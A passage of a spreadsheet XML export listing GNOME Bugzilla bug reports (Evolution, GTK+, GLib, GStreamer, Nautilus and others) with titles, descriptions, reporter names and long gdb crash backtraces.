#4  0x415bd63e in g_async_queue_pop_unlocked () from /usr/lib/libglib-2.0.so.0
#5  0x415f1f81 in g_static_rw_lock_free () from /usr/lib/libglib-2.0.so.0
#6  0x415f0bb6 in g_static_private_free () from /usr/lib/libglib-2.0.so.0
#7  0x413e3f60 in pthread_start_thread () from /lib/i686/libpthread.so.0
#8  0x41710327 in clone () from /lib/i686/libc.so.6
Thread 12 (Thread 2064395 (LWP 7990)):
#0  0x413e6b94 in __pthread_sigsuspend () from /lib/i686/libpthread.so.0
#1  0x413e69d8 in __pthread_wait_for_restart_signal () from
/lib/i686/libpthread.so.0
#2  0x413e2e90 in pthread_cond_wait@GLIBC_2.0 () from /lib/i686/libpthread.so.0
#3  0x409ce7b5 in giop_recv_buffer_get () from /opt/gnome/lib/libORBit-2.so.0
#4  0x409d2a41 in ORBit_small_invoke_stub () from
/opt/gnome/lib/libORBit-2.so.0
#5  0x409d28a2 in ORBit_small_invoke_stub_n () from
/opt/gnome/lib/libORBit-2.so.0
#6  0x409e938c in ORBit_c_stub_invoke () from /opt/gnome/lib/libORBit-2.so.0
#7  0x40997b9c in Bonobo_Unknown_ref () from
/opt/gnome/lib/libbonobo-activation.so.4
#8  0x40781df3 in bonobo_object_dup_ref () from /opt/gnome/lib/libbonobo-2.so.0
#9  0x41a82b55 in impl_BookListener_respond_get_view (servant=0x4325210c
status=GNOME_Evolution_Addressbook_Success
    book_view=0x91ab958 ev=0x45bffdac) at e-book-listener.c:167
#10 0x41a7da0e in
_ORBIT_skel_small_GNOME_Evolution_Addressbook_BookListener_notifyViewRequested
(_o_servant=0x4325210c _o_retval=0x0
    _o_args=0xfffffffc _o_ctx=0x45bffcdc _o_ev=0x45bffdac
_impl_notifyViewRequested=0x41a82ae0 )
    at Evolution-DataServer-Addressbook-common.c:393
#11 0x409e5a48 in ORBit_POA_setup_root () from /opt/gnome/lib/libORBit-2.so.0
#12 0x409ea975 in ORBit_OAObject_invoke () from /opt/gnome/lib/libORBit-2.so.0
#13 0x409d2f1c in ORBit_small_invoke_adaptor () from
/opt/gnome/lib/libORBit-2.so.0
#14 0x409e5f5c in ORBit_recv_buffer_return_sys_exception () from
/opt/gnome/lib/libORBit-2.so.0
#15 0x409e6174 in ORBit_recv_buffer_return_sys_exception () from
/opt/gnome/lib/libORBit-2.so.0
#16 0x409cbdc4 in giop_thread_queue_process () from
/opt/gnome/lib/libORBit-2.so.0
#17 0x409cb4b9 in giop_thread_same_key () from /opt/gnome/lib/libORBit-2.so.0
#18 0x415f2002 in g_static_rw_lock_free () from /usr/lib/libglib-2.0.so.0
#19 0x415f0bb6 in g_static_private_free () from /usr/lib/libglib-2.0.so.0
#20 0x413e3f60 in pthread_start_thread () from /lib/i686/libpthread.so.0
#21 0x41710327 in clone () from /lib/i686/libc.so.6
Thread 11 (Thread 868362 (LWP 7598)):
#0  0x413e6b94 in __pthread_sigsuspend () from /lib/i686/libpthread.so.0
#1  0x413e69d8 in __pthread_wait_for_restart_signal () from
/lib/i686/libpthread.so.0
#2  0x413e2e90 in pthread_cond_wait@GLIBC_2.0 () from /lib/i686/libpthread.so.0
#3  0x400893ae in e_msgport_wait (mp=0x8b40e58) at e-msgport.c:511
#4  0x40089cc6 in thread_dispatch (din=0x8b3af58) at e-msgport.c:874
#5  0x413e3f60 in pthread_start_thread () from /lib/i686/libpthread.so.0
#6  0x41710327 in clone () from /lib/i686/libc.so.6
Thread 10 (Thread 1228809 (LWP 7753)):
#0  0x413e6b94 in __pthread_sigsuspend () from /lib/i686/libpthread.so.0
#1  0x413e69d8 in __pthread_wait_for_restart_signal () from
/lib/i686/libpthread.so.0
---Type  to continue or q  to quit---
#2  0x413e2e90 in pthread_cond_wait@GLIBC_2.0 () from /lib/i686/libpthread.so.0
#3  0x400893ae in e_msgport_wait (mp=0x8102838) at e-msgport.c:511
#4  0x40089cc6 in thread_dispatch (din=0x81027e0) at e-msgport.c:874
#5  0x413e3f60 in pthread_start_thread () from /lib/i686/libpthread.so.0
#6  0x41710327 in clone () from /lib/i686/libc.so.6
Thread 9 (Thread 409608 (LWP 29911)):
#0  0x413e6b94 in __pthread_sigsuspend () from /lib/i686/libpthread.so.0
#1  0x413e69d8 in __pthread_wait_for_restart_signal () from
/lib/i686/libpthread.so.0
#2  0x413e2e90 in pthread_cond_wait@GLIBC_2.0 () from /lib/i686/libpthread.so.0
#3  0x400893ae in e_msgport_wait (mp=0x8102838) at e-msgport.c:511
#4  0x40089cc6 in thread_dispatch (din=0x81027e0) at e-msgport.c:874
#5  0x413e3f60 in pthread_start_thread () from /lib/i686/libpthread.so.0
#6  0x41710327 in clone () from /lib/i686/libc.so.6
Thread 8 (Thread 196615 (LWP 29840)):
#0  0x413e6b94 in __pthread_sigsuspend () from /lib/i686/libpthread.so.0
#1  0x413e69d8 in __pthread_wait_for_restart_signal () from
/lib/i686/libpthread.so.0
#2  0x413e2e90 in pthread_cond_wait@GLIBC_2.0 () from /lib/i686/libpthread.so.0
#3  0x400893ae in e_msgport_wait (mp=0x8102790) at e-msgport.c:511
#4  0x40089cc6 in thread_dispatch (din=0x8102738) at e-msgport.c:874
#5  0x413e3f60 in pthread_start_thread () from /lib/i686/libpthread.so.0
#6  0x41710327 in clone () from /lib/i686/libc.so.6
Thread 7 (Thread 180230 (LWP 29839)):
#0  0x413e6b94 in __pthread_sigsuspend () from /lib/i686/libpthread.so.0
#1  0x413e69d8 in __pthread_wait_for_restart_signal () from
/lib/i686/libpthread.so.0
#2  0x413e2e90 in pthread_cond_wait@GLIBC_2.0 () from /lib/i686/libpthread.so.0
#3  0x400893ae in e_msgport_wait (mp=0x81026e8) at e-msgport.c:511
#4  0x40089cc6 in thread_dispatch (din=0x8102690) at e-msgport.c:874
#5  0x413e3f60 in pthread_start_thread () from /lib/i686/libpthread.so.0
#6  0x41710327 in clone () from /lib/i686/libc.so.6
Thread 6 (Thread 163845 (LWP 29838)):
#0  0x413e6b94 in __pthread_sigsuspend () from /lib/i686/libpthread.so.0
#1  0x413e69d8 in __pthread_wait_for_restart_signal () from
/lib/i686/libpthread.so.0
#2  0x413e2e90 in pthread_cond_wait@GLIBC_2.0 () from /lib/i686/libpthread.so.0
#3  0x400893ae in e_msgport_wait (mp=0x8102838) at e-msgport.c:511
#4  0x40089cc6 in thread_dispatch (din=0x81027e0) at e-msgport.c:874
#5  0x413e3f60 in pthread_start_thread () from /lib/i686/libpthread.so.0
#6  0x41710327 in clone () from /lib/i686/libc.so.6
Thread 5 (Thread 49156 (LWP 29823)):
#0  0x41707b66 in poll () from /lib/i686/libc.so.6
#1  0x415d7334 in g_main_loop_get_context () from /usr/lib/libglib-2.0.so.0
#2  0x415d6479 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#3  0x415d6e8c in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#4  0x409ab7ce in link_thread_io_context () from
/opt/gnome/lib/libORBitCosNaming-2.so.0
#5  0x415f0bb6 in g_static_private_free () from /usr/lib/libglib-2.0.so.0
#6  0x413e3f60 in pthread_start_thread () from /lib/i686/libpthread.so.0
#7  0x41710327 in clone () from /lib/i686/libc.so.6
---Type  to continue or q  to quit---
Thread 4 (Thread 32771 (LWP 29822)):
#0  0x413e6b94 in __pthread_sigsuspend () from /lib/i686/libpthread.so.0
#1  0x413e69d8 in __pthread_wait_for_restart_signal () from
/lib/i686/libpthread.so.0
#2  0x413e2e90 in pthread_cond_wait@GLIBC_2.0 () from /lib/i686/libpthread.so.0
#3  0x41a872f0 in e_book_get_book_view (book=0x9a8f0f0 query=0x8f6c368
requested_fields=0x0 max_results=-1 book_view=0x43221750
    error=0x4290de84) at e-book.c:1037
#4  0x41a823b5 in _get_book_view_handler (msg=0x8f6be58) at e-book-async.c:1053
#5  0x41a808c7 in worker (data=0x0) at e-book-async.c:24
#6  0x415f0bb6 in g_static_private_free () from /usr/lib/libglib-2.0.so.0
#7  0x413e3f60 in pthread_start_thread () from /lib/i686/libpthread.so.0
#8  0x41710327 in clone () from /lib/i686/libc.so.6
Thread 3 (Thread 16386 (LWP 29821)):
#0  0x413e6b94 in __pthread_sigsuspend () from /lib/i686/libpthread.so.0
#1  0x413e69d8 in __pthread_wait_for_restart_signal () from
/lib/i686/libpthread.so.0
#2  0x413e2e90 in pthread_cond_wait@GLIBC_2.0 () from /lib/i686/libpthread.so.0
#3  0x415d528f in g_main_context_wait () from /usr/lib/libglib-2.0.so.0
#4  0x415d6ce7 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#5  0x4077c8b7 in bonobo_main () from /opt/gnome/lib/libbonobo-2.so.0
#6  0x41a8a026 in startup_mainloop (arg=0x0) at e-book.c:2346
#7  0x413e3f60 in pthread_start_thread () from /lib/i686/libpthread.so.0
#8  0x41710327 in clone () from /lib/i686/libc.so.6
Thread 2 (Thread 32769 (LWP 29820)):
#0  0x41707b66 in poll () from /lib/i686/libc.so.6
#1  0x413e3a8e in __pthread_manager () from /lib/i686/libpthread.so.0
#2  0x41710327 in clone () from /lib/i686/libc.so.6
Thread 1 (Thread 16384 (LWP 29808)):
#0  0x413e6b94 in __pthread_sigsuspend () from /lib/i686/libpthread.so.0
#1  0x413e69d8 in __pthread_wait_for_restart_signal () from
/lib/i686/libpthread.so.0
#2  0x413e2e90 in pthread_cond_wait@GLIBC_2.0 () from /lib/i686/libpthread.so.0
#3  0x409ce7b5 in giop_recv_buffer_get () from /opt/gnome/lib/libORBit-2.so.0
#4  0x409d2a41 in ORBit_small_invoke_stub () from
/opt/gnome/lib/libORBit-2.so.0
#5  0x409d28a2 in ORBit_small_invoke_stub_n () from
/opt/gnome/lib/libORBit-2.so.0
#6  0x409e938c in ORBit_c_stub_invoke () from /opt/gnome/lib/libORBit-2.so.0
#7  0x40997be8 in Bonobo_Unknown_unref () from
/opt/gnome/lib/libbonobo-activation.so.4
#8  0x40781e80 in bonobo_object_release_unref () from
/opt/gnome/lib/libbonobo-2.so.0
#9  0x41a84cca in e_book_view_dispose (object=0x8fe6078) at e-book-view.c:240
#10 0x41574d60 in g_object_interface_list_properties () from
/usr/lib/libgobject-2.0.so.0
#11 0x415781da in g_object_unref () from /usr/lib/libgobject-2.0.so.0
#12 0x41c5d07b in e_select_names_completion_got_book_view_cb
(book=0x9209e20 status=E_BOOK_ERROR_OK view=0x8f6bdf0
    user_data=0x9ac9730) at e-select-names-completion.c:806
#13 0x41a822e3 in _get_book_view_response_handler (msg=0xfffffffc) at
e-book-async.c:1028
#14 0x41a808f9 in main_thread_check_for_response (data=0x0) at
e-book-async.c:37
#15 0x415d806a in g_main_context_wakeup () from /usr/lib/libglib-2.0.so.0
#16 0x415d4be2 in unblock_source () from /usr/lib/libglib-2.0.so.0
#17 0x415d5f71 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#18 0x415d64a4 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#19 0x415d6e8c in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
---Type  to continue or q  to quit---
#20 0x4077c8b7 in bonobo_main () from /opt/gnome/lib/libbonobo-2.so.0
#21 0x0806323a in main (argc=1 argv=0xbffff544) at main.c:647
#0  0x413e6b94 in __pthread_sigsuspend () from /lib/i686/libpthread.so.0
(gdb) quit</t>
  </si>
  <si>
    <t>DASHER-318357</t>
  </si>
  <si>
    <t>Buttons preferences have radio buttons that are all selected</t>
  </si>
  <si>
    <t>Enter the preferences window. Look at the buttons preferences. All the radio
widgets appear to be selected simultaneously.</t>
  </si>
  <si>
    <t>mjg59-gnomebugzilla</t>
  </si>
  <si>
    <t>GSTREAMER-521761</t>
  </si>
  <si>
    <t>gstaudioclock frozen the clock value until reaches latest 'last_time'</t>
  </si>
  <si>
    <t>After change the pipeline state back to NULL
the 'last_time' value stored in the clock it not reset.
But the audio base classes reset the number of samples played.
Then when setting the pipeline to PLAYING again the clock value will be frozen 'cause the clock will always return MAX(last_time time).
The solution implemented in attached patches do:
1- create a gst_clock_reset funcion
just to make it possible to set last_time to 0 again
2- calls gst_clock_reset when uses gst_audio_clock is the clock provided in change_state function from NULL to READY.
I'm just waiting the reviews and OK to commit.
Thanks</t>
  </si>
  <si>
    <t>edgard.lima</t>
  </si>
  <si>
    <t>GLIB-119490</t>
  </si>
  <si>
    <t>system snprintf used even if broken</t>
  </si>
  <si>
    <t>The configure.in in HEAD glib and/or vasprintf.c is a bit broken. 
configure.in AC_DEFINEs HAVE_C99_SNPRINTF to 1 without checking if it has 
deduced that it it is going to use the included printf. Then it checks if 
there is a system snprintf without checking its semantics and AC_DEFINEs 
HAVE_SNPRINTF if there is one. Then it calls AC_FUNC_SNPRINTF_C99 but 
even if that finds out that the system snprintf is broken it doesn't 
undefine HAVE_C99_SNPRINTF or HAVE_SNPRINTF.
vasprintf.c uses the system snprintf if HAVE_SNPRINTF is defined even if 
it is broken.
(It is perhaps a bit confusing to use HAVE_* macros both for features in 
the system C library and stuff being implemented by glib itself.)
This comes up on mingw where (at least on the version I have) the mingw-
provided snprintf does not support %n and does not return correctly how 
many bytes *would have been used* even if there wasn't room but instead 
returns -1 if it didn't fit.
I don't have any clean fix to suggest yet. Will try to come up with one. 
One fix would perhaps be to AC_DEFINE another macro say 
HAVE_C99_SNPRINTF_IN_C_LIBRARY if AC_FUNC_SNPRINTF_C99 succeeds and test 
that in vasprintf.c</t>
  </si>
  <si>
    <t>LIBGNOMEUI-156895</t>
  </si>
  <si>
    <t>'Custom Icon'  GtkFileSelector should allow selection of folders.</t>
  </si>
  <si>
    <t>1. Right click on a panel launcher or Desktop Icon
2. Select 'Properties'
3. Hit the 'Custom Icon' Button.
4. Go to 'Browse' and navigate around the directory tree.
5. Select a directory you wish to preview in the main window.
6. Click 'Open'
Expected Outcome: FileSelector passes the directory path back to the Icon
Chooser widget wich then displays a preview of the icons in the window.
Actual Outcome: FileSelector opens said directory in its own window and offers
you selection of files inside (but with no meaningful preview).</t>
  </si>
  <si>
    <t>dom</t>
  </si>
  <si>
    <t>NAUTILUS-77292</t>
  </si>
  <si>
    <t>New menu items are strange.</t>
  </si>
  <si>
    <t>New Window opens my a Nautilus window on my home folder instead of
the desktop. There seems to be no way to open the desktop as a list or
other view from the desktop itself. CDE/Motif users will expect New Window
to open a terminal.
New Folder doesn't open a window at all but instead makes a new folder
icon on the desktop. This should grab the keyboard so it doesn't lose focus
when the menu closes.
New Terminal open a window but it's not a nautilus window. What good
is a terminal without a text-shell or some text-based program? Isn't the
shell the important thing?</t>
  </si>
  <si>
    <t>gregory.merchan</t>
  </si>
  <si>
    <t>METATHEME-58083</t>
  </si>
  <si>
    <t>deselecting xmms crashes metatheme-edit</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Metatheme
Severity: normal
Version: 0.6.0
Synopsis: deselecting xmms crashes metatheme-edit
Bugzilla-Product: Metatheme
Bugzilla-Component: metatheme-edit
Description:
Try this.  Open metatheme-edit.  Click the xmms tab.  Unselect the check box Enabled.  This causes the app to crash for me every time.
Debugging Information:
(no debugging symbols found)...[New Thread 1024 (LWP 16884)]
0x405ae519 in __wait4 ()
   from /lib/i686/libc.so.6
#0  0x405ae519 in __wait4 () from /lib/i686/libc.so.6
#1  0x4061e9e4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x400b7262 in gnome_segv_handle (signum=11) at gnome-init.c:659
#3  
#4  0x0804b2d4 in editor_page_new_from_ext () at eval.c:41
#5  0x401fde4b in gtk_marshal_NONE__NONE (object=0x80e3328 
    func=0x804b1ac  func_data=0x80daba0 
    args=0xbfffea40) at gtkmarshal.c:312
#6  0x4022d56a in gtk_handlers_run (handlers=0x80da758 signal=0xbfffe9e0 
    object=0x80e3328 params=0xbfffea40 after=0) at gtksignal.c:1917
#7  0x4022c9bb in gtk_signal_real_emit (object=0x80e3328 signal_id=77 
    params=0xbfffea40) at gtksignal.c:1477
#8  0x4022aa30 in gtk_signal_emit (object=0x80e3328 signal_id=77)
    at gtksignal.c:552
#9  0x40249834 in gtk_toggle_button_toggled (toggle_button=0x80e3328)
    at gtktogglebutton.c:309
#10 0x40249ff0 in gtk_toggle_button_clicked (button=0x80e3328)
    at gtktogglebutton.c:515
#11 0x401fde4b in gtk_marshal_NONE__NONE (object=0x80e3328 
    func=0x40249f44  func_data=0x0 
    args=0xbfffedd0) at gtkmarshal.c:312
#12 0x4022c867 in gtk_signal_real_emit (object=0x80e3328 signal_id=74 
    params=0xbfffedd0) at gtksignal.c:1440
#13 0x4022aa30 in gtk_signal_emit (object=0x80e3328 signal_id=74)
    at gtksignal.c:552
#14 0x4019b58c in gtk_button_clicked (button=0x80e3328) at gtkbutton.c:336
#15 0x40249f16 in gtk_toggle_button_released (button=0x80e3328)
    at gtktogglebutton.c:488
#16 0x401fde4b in gtk_marshal_NONE__NONE (object=0x80e3328 
    func=0x40249e70  func_data=0x0 
    args=0xbffff160) at gtkmarshal.c:312
#17 0x4022c867 in gtk_signal_real_emit (object=0x80e3328 signal_id=73 
    params=0xbffff160) at gtksignal.c:1440
#18 0x4022aa30 in gtk_signal_emit (object=0x80e3328 signal_id=73)
    at gtksignal.c:552
#19 0x4019b4d0 in gtk_button_released (button=0x80e3328) at gtkbutton.c:327
#20 0x4019c477 in gtk_button_button_release (widget=0x80e3328 event=0x80ee150)
    at gtkbutton.c:721
#21 0x401fdc21 in gtk_marshal_BOOL__POINTER (object=0x80e3328 
    func=0x4019c3b4  func_data=0x0 
    args=0xbffff500) at gtkmarshal.c:28
#22 0x4022c9fb in gtk_signal_real_emit (object=0x80e3328 signal_id=31 
    params=0xbffff500) at gtksignal.c:1492
#23 0x4022aa30 in gtk_signal_emit (object=0x80e3328 signal_id=31)
    at gtksignal.c:552
#24 0x40261ee8 in gtk_widget_event (widget=0x80e3328 event=0x80ee150)
    at gtkwidget.c:2864
#25 0x401fdb98 in gtk_propagate_event (widget=0x80e3328 event=0x80ee150)
    at gtkmain.c:1378
#26 0x401fcd55 in gtk_main_do_event (event=0x80ee150) at gtkmain.c:818
#27 0x402b716b in gdk_event_dispatch (source_data=0x0 
    current_time=0xbffff8d0 user_data=0x0) at gdkevents.c:2139
#28 0x40450055 in g_main_dispatch (dispatch_time=0xbffff8d0) at gmain.c:656
#29 0x40450659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#30 0x404507e8 in g_main_run (loop=0x80ed928) at gmain.c:935
#31 0x401fc65b in gtk_main () at gtkmain.c:524
#32 0x0804a44e in main () at eval.c:41
#33 0x40510177 in __libc_start_main (main=0x804a1c0  argc=1 
    ubp_av=0xbffff9d4 init=0x8049a7c  fini=0x804be90  
    rtld_fini=0x4000e184  stack_end=0xbffff9cc)
    at ../sysdeps/generic/libc-start.c:129
#0  0x405ae519 in __wait4 () from /lib/i686/libc.so.6
No locals.
#1  0x4061e9e4 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x400b7262 in gnome_segv_handle (signum=11) at gnome-init.c:659
	in gnome-init.c
estatus = 135148608
in_segv = 1
pid = 0
#3  
No locals.
#4  0x0804b2d4 in editor_page_new_from_ext () at eval.c:41
	in eval.c
ap = (void **) 0x3
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x3 
result = 3
result = 3
#5  0x401fde4b in gtk_marshal_NONE__NONE (object=0x80e3328 
    func=0x804b1ac  func_data=0x80daba0 
    args=0xbfffea40) at gtkmarshal.c:312
	in gtkmarshal.c
No locals.
#6  0x4022d56a in gtk_handlers_run (handlers=0x80da758 signal=0xbfffe9e0 
    object=0x80e3328 params=0xbfffea40 after=0) at gtksignal.c:1917
	in gtksignal.c
handlers = (GtkHandler *) 0x3
handlers_next = (GtkHandler *) 0x80da758
#7  0x4022c9bb in gtk_signal_real_emit (object=0x80e3328 signal_id=77 
    params=0xbfffea40) at gtksignal.c:1477
1477	in gtksignal.c
return_val = -512
signal = {signal_id = 77 object_type = 54805 name = 0x80ae4b8 toggled 
  function_offset = 356 marshaller = 0x401fde3c  
  return_val = 1 signal_flags = 1 nparams = 0 params = 0x0 hook_list = 0x0}
handlers = (GtkHandler *) 0x0
signal_func = 0
emission = (GtkEmission *) 0x809c60c
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-07-25 21:23 -------
The original reporter (farnsworth@olin.wustl.edu) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component tvgm@ximian.com.
</t>
  </si>
  <si>
    <t>farnsworth</t>
  </si>
  <si>
    <t>GTK+-344850</t>
  </si>
  <si>
    <t>Dragging a GtkTreeViewColumn segfaults when using certain GtkTreeViewColumnDropFunc</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Create a script that has a treeview and some columns
2. Create your own GtkTreeViewColumnDropFunc that always returns false for one certain column
3. If the column is the last one and you try to drag it your program will segfault.
It does not segfault when the column is not at the last place.
Stack trace:
Sorry I don't have debugging enabled in Gtk but maybe it helps:
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread 16384 (LWP 12584)]
0xb738a312 in gtk_tree_view_get_fixed_height_mode ()
   from /usr/lib/libgtk-x11-2.0.so.0
(gdb) bt
#0  0xb738a312 in gtk_tree_view_get_fixed_height_mode ()
   from /usr/lib/libgtk-x11-2.0.so.0
#1  0x00000000 in ?? ()
#2  0x08e1cfc0 in ?? ()
#3  0x08e133c8 in ?? ()
#4  0x08e170f8 in ?? ()
#5  0x08e13494 in ?? ()
#6  0x08e081b8 in ?? ()
#7  0x08e15750 in ?? ()
#8  0x08e0ade8 in ?? ()
#9  0x00000000 in ?? ()
#10 0x08e19ad0 in ?? ()
#11 0x00000000 in ?? ()
#12 0xb7474310 in ?? () from /usr/lib/libgtk-x11-2.0.so.0
#13 0x08e19ad0 in ?? ()
#14 0x08e081b8 in ?? ()
#15 0x08815d18 in ?? ()
#16 0xb738a5e3 in gtk_tree_view_get_fixed_height_mode ()
   from /usr/lib/libgtk-x11-2.0.so.0
#17 0x08e081b8 in ?? ()
#18 0x08e19ad0 in ?? ()
#19 0x00000000 in ?? ()
#20 0x00000000 in ?? ()
#21 0x00000000 in ?? ()
#22 0x00000000 in ?? ()
#23 0x00000000 in ?? ()
#24 0x00000000 in ?? ()
#25 0x00000000 in ?? ()
#26 0x00000000 in ?? ()
#27 0x00000000 in ?? ()
#28 0x088173d0 in ?? ()
#29 0x00000000 in ?? ()
#30 0x08e15750 in ?? ()
#31 0x088173d0 in ?? ()
#32 0xb72f6fab in gtk_settings_get_for_screen ()
   from /usr/lib/libgtk-x11-2.0.so.0
#33 0x088173d0 in ?? ()
#34 0x00000001 in ?? ()
#35 0x087ffdc4 in ?? ()
#36 0xb6fd4668 in ?? () from /usr/lib/libgobject-2.0.so.0
#37 0x08df9c20 in ?? ()
#38 0x00000013 in ?? ()
#39 0x00000015 in ?? ()
#40 0xb6fad5a6 in g_object_get () from /usr/lib/libgobject-2.0.so.0
#41 0x08df9c20 in ?? ()
#42 0xb73d4021 in gtk_combo_string_key () from /usr/lib/libgtk-x11-2.0.so.0
#43 0xbfba6020 in ?? ()
#44 0xb7474310 in ?? () from /usr/lib/libgtk-x11-2.0.so.0
#45 0x08e15750 in ?? ()
#46 0xb7474310 in ?? () from /usr/lib/libgtk-x11-2.0.so.0
#47 0x08e15750 in ?? ()
#48 0xb722ffd9 in gtk_drag_check_threshold () from /usr/lib/libgtk-x11-2.0.so.0
#49 0x00000014 in ?? ()
Other information:</t>
  </si>
  <si>
    <t>cweiske</t>
  </si>
  <si>
    <t>EVOLUTION-241595</t>
  </si>
  <si>
    <t>gnomecanvas 2.2.0.2 has no member im_context</t>
  </si>
  <si>
    <t>Hi :)
Could you check this one:
e-minicard-label.c: In function `e_minicard_label_realize':
e-minicard-label.c:313: structure has no member named `im_context'
e-minicard-label.c:327: structure has no member named `im_context'
e-minicard-label.c: In function `e_minicard_label_event':
e-minicard-label.c:368: warning: unused variable `canvas'
make[4]: *** [e-minicard-label.lo] Fehler 1
make[4]: Leaving directory `/var/tmp/portage/evolution-1.3.
2/work/evolution-1.3.2/addressbook/gui/widgets'
It seems to me that I need a newer version of libgnomecanvas? (I have 2.2.
0.2)
(canvas is type GnomeCanvas and the structure mentioned here is canvas 
too)
This happens with evolution 1.3.2 from the homepage.
cheers
    Danny</t>
  </si>
  <si>
    <t>danny.milo</t>
  </si>
  <si>
    <t>GALEON-84648</t>
  </si>
  <si>
    <t>Tabs are broken</t>
  </si>
  <si>
    <t>Start up galeon.
Open a page www.gnome.org for example.
Open a new page www.slashdot.org for example.
Switch back to the first tab instead of showing the gnome homepage
everything is gray
mozilla 20020529 (unofficial debian package)
galeon from cvs head from 20020609</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-86480</t>
  </si>
  <si>
    <t>Sawfish properties fail</t>
  </si>
  <si>
    <t xml:space="preserve">Package: control-center
Severity: normal
Version: 1.4.0.5-1.ximian.3
Synopsis: Sawfish properties fail
Bugzilla-Product: control-center
Bugzilla-Component: Window preferences
Description:
When I try to start any option of Sawfish properties at Control Panel
it says:
The applet encountered an error.
Distro: SuSE Profesional 8.0 With Ximian Desktop 1.1
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-06-25 20:51 -------
The original reporter (adrians@opensys.com.mx) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component snickell@stanford.edu.
</t>
  </si>
  <si>
    <t>adrians</t>
  </si>
  <si>
    <t>GNOTE-660653</t>
  </si>
  <si>
    <t>main</t>
  </si>
  <si>
    <t>GNOTE</t>
  </si>
  <si>
    <t>Port the new trie implementation from Tomboy</t>
  </si>
  <si>
    <t>Tomboy recently updated its trie implementation: https://bugzilla.gnome.org/584362</t>
  </si>
  <si>
    <t>gnote-maint</t>
  </si>
  <si>
    <t>GNOME-PRINT-331320</t>
  </si>
  <si>
    <t>Crash printing calendar in Evolution-2.5.90</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Fedora Core release 4 (Rawhide)
Package: Evolution
Priority: Critical
Version: GNOME2.13.90 unspecified
Gnome-Distributor: Red Hat Inc
Synopsis: Crash printing calendar in Evolution-2.5.90
Bugzilla-Product: Evolution
Bugzilla-Component: Calendar
Bugzilla-Version: unspecified
BugBuddy-GnomeVersion: 2.0 (2.13.3)
Description:
Crash on print before dialog comes up every time.
Debugging Information:
Backtrace was generated from '/usr/bin/evolution'
Using host libthread_db library /lib/libthread_db.so.1.
`shared object read from target memory' has disappeared keeping its
symbols.
[Thread debugging using libthread_db enabled]
[New Thread -1208665920 (LWP 1936)]
[New Thread -1329595488 (LWP 2534)]
[New Thread -1327338592 (LWP 1976)]
[New Thread -1316697184 (LWP 1973)]
[New Thread -1306207328 (LWP 1972)]
[New Thread -1295324256 (LWP 1969)]
[New Thread -1268708448 (LWP 1968)]
[New Thread -1257825376 (LWP 1943)]
[New Thread -1247335520 (LWP 1942)]
[New Thread -1236845664 (LWP 1939)]
[New Thread -1226355808 (LWP 1938)]
0x004ef402 in __kernel_vsyscall ()
#0  0x004ef402 in __kernel_vsyscall ()
#1  0x00a5b80b in __waitpid_nocancel () from /lib/libpthread.so.0
#2  0x06317086 in gnome_init_with_popt_table ()
   from /usr/lib/libgnomeui-2.so.0
#3  
#4  IA__g_logv (log_domain=) at gmessages.c:503
#5  0x00be3c89 in IA__g_log (log_domain=0x0
log_level=G_LOG_LEVEL_ERROR 
    format=0xc0c7c4 file %s: line %d (%s): assertion failed: (%s))
    at gmessages.c:517
#6  0x00be3d06 in IA__g_assert_warning (log_domain=0x0 
    file=0x780ff5 dbus-gmain.c line=265 
    pretty_function=0x78123a connection_setup_add_watch 
    expression=0x781114 dbus_watch_get_data (watch) == NULL)
    at gmessages.c:552
#7  0x007702b4 in connection_setup_add_watch (cs=) at dbus-gmain.c:265
#8  0x007708be in connection_setup_new_from_old (context=) at
dbus-gmain.c:526
#9  0x00770c15 in dbus_connection_setup_with_g_main
(connection=0x8ac42f8 
    context=0x880bad8) at dbus-gmain.c:589
#10 0x0781c5b0 in gnome_cups_printer_get_icon ()
   from /usr/lib/libgnomecups-1.0.so.1
#11 0x0781c87b in gnome_cups_printer_new_printer_notify_add ()
   from /usr/lib/libgnomecups-1.0.so.1
#12 0x02cb1e48 in gnome_print_cups_printer_list_append (
    printers_list=0xc5db4f0 
    module_path=0xcbd4378
/usr/lib/libgnomeprint/2.12.1/modules/libgnomeprintcups.so) at
gnome-print-cups.c:684
#13 0x06927e93 in gpa_printer_list_load () at gpa-printer.c:364
#14 0x06928294 in gpa_init () at gpa-root.c:190
#15 0x069289ac in gpa_config_from_string (
    str=0xcbae918 \n&lt;GnomePrintConfig
Version=\2.1\ LibgnomeprintVersion=\2.12.1\
SelectedSettings=\SETTINGS-000989541673031997000001\&gt;\n  &lt;Settings
Id=\SETTINGS-000989541673031997000001\ Model=\GNOM... flags=0) at
gpa-config.c:285
#16 0x068f64f7 in gnome_print_config_from_string (
    str=0xcbae918 \n&lt;GnomePrintConfig
Version=\2.1\ LibgnomeprintVersion=\2.12.1\
SelectedSettings=\SETTINGS-000989541673031997000001\&gt;\n  &lt;Settings
Id=\SETTINGS-000989541673031997000001\ Model=\GNOM... flags=0) at
gnome-print-config.c:631
#17 0x06bb3129 in e_print_load_config () at e-print.c:43
#18 0x00fe7a65 in print_calendar (gcal=0x92eff80 preview=0
date=1140022800 
    default_view=PRINT_VIEW_DAY) at print.c:2509
#19 0x00f6c16e in print (gcal=0x92eff80 preview=0) at
calendar-commands.c:127
#20 0x0639ac43 in bonobo_ui_component_add_verb_list ()
   from /usr/lib/libbonoboui-2.so.0
#21 0x00c52f9d in IA__g_closure_invoke (closure=0xbd26d10 
    return_value=0xbf87eb84 n_param_values=2 param_values=0xcae78e8 
